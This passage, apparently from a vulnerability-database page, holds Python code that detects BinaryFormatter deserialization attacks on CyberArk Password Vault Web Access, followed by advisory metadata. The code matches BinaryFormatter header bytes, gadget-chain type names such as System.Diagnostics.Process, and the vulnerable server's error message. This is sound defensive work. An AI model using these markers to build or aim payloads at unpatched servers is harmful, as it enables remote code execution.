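import base64
import binascii
import re
from typing import Optional

# A BinaryFormatter stream opens with a SerializationHeaderRecord:
# RecordType 0, RootId 1, HeaderId -1, MajorVersion 1, MinorVersion 0.
BINARYFORMATTER_MAGIC = bytes([0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,
                               0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])

# Type names present in the gadget chain shown in the plugin above; a
# session token has no reason to contain any of them.
GADGET_MARKERS = (b"System.DelegateSerializationHolder",
                  b"System.Diagnostics.Process",
                  b"System.Collections.Generic.SortedSet")

# Cast error a vulnerable PVWA returned (from the plugin's comments); a
# log pipeline can use it to spot probes after the fact.
VULN_RESPONSE_RE = re.compile(
    r"Unable to cast object of type .* to type 'CyberArk\.Services\.Web\.SessionIdentifiers'")


def decode_authorization(header_value: str) -> Optional[bytes]:
    """Base64-decode an Authorization value; tolerate a scheme prefix and missing padding."""
    token = header_value.strip()
    parts = token.split(None, 1)
    if len(parts) == 2 and parts[0].lower() in ("basic", "bearer"):
        token = parts[1]
    token += "=" * (-len(token) % 4)
    try:
        return base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify_authorization(header_value: str) -> str:
    """Return 'serialized-object', 'suspicious' or 'ok' for one header value."""
    raw = decode_authorization(header_value)
    if raw is None:
        return "ok"  # not base64 at all, so not a BinaryFormatter payload
    if raw.startswith(BINARYFORMATTER_MAGIC):
        return "serialized-object"
    if any(marker in raw for marker in GADGET_MARKERS):
        return "suspicious"
    return "ok"


def vulnerable_response_seen(body: str) -> bool:
    """True when a response body or log line carries the vulnerable PVWA's cast error."""
    return VULN_RESPONSE_RE.search(body) is not None


# Constructed samples: a normal Basic credential (alice:s3cret), a stream
# with the BinaryFormatter header, and a token that only names a gadget type.
SAMPLE_BASIC = "Basic YWxpY2U6czNjcmV0"
SAMPLE_SERIALIZED = base64.b64encode(
    BINARYFORMATTER_MAGIC + b"\x0c\x02\x00\x00\x00System, Version=4.0.0.0").decode()
SAMPLE_MARKER_ONLY = base64.b64encode(b"junk System.Diagnostics.Process junk").decode()
```

The header check is cheap enough to run inline at a reverse proxy in front of PVWA; the response check is meant for IIS or application logs, where a hit means someone probed the endpoint while it was still unpatched.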
    

Packetstorm

data source: https://packetstormsecurity.com/files/download/147105/rt-sa-2017-014.txt
id: PACKETSTORM:147105
last seen: 2018-04-10
published: 2018-04-09
reporter: redteam-pentesting.de
source: https://packetstormsecurity.com/files/147105/CyberArk-Password-Vault-Web-Access-Remote-Code-Execution.html
title: CyberArk Password Vault Web Access Remote Code Execution

The Hacker News

id: THN:A7F528F861EE01F1A3D095D085EDB80F
last seen: 2018-04-09
modified: 2018-04-09
published: 2018-04-09
reporter: Mohit Kumar
source: https://thehackernews.com/2018/04/enterprise-password-vault.html
title: Critical Code Execution Flaw Found in CyberArk Enterprise Password Vault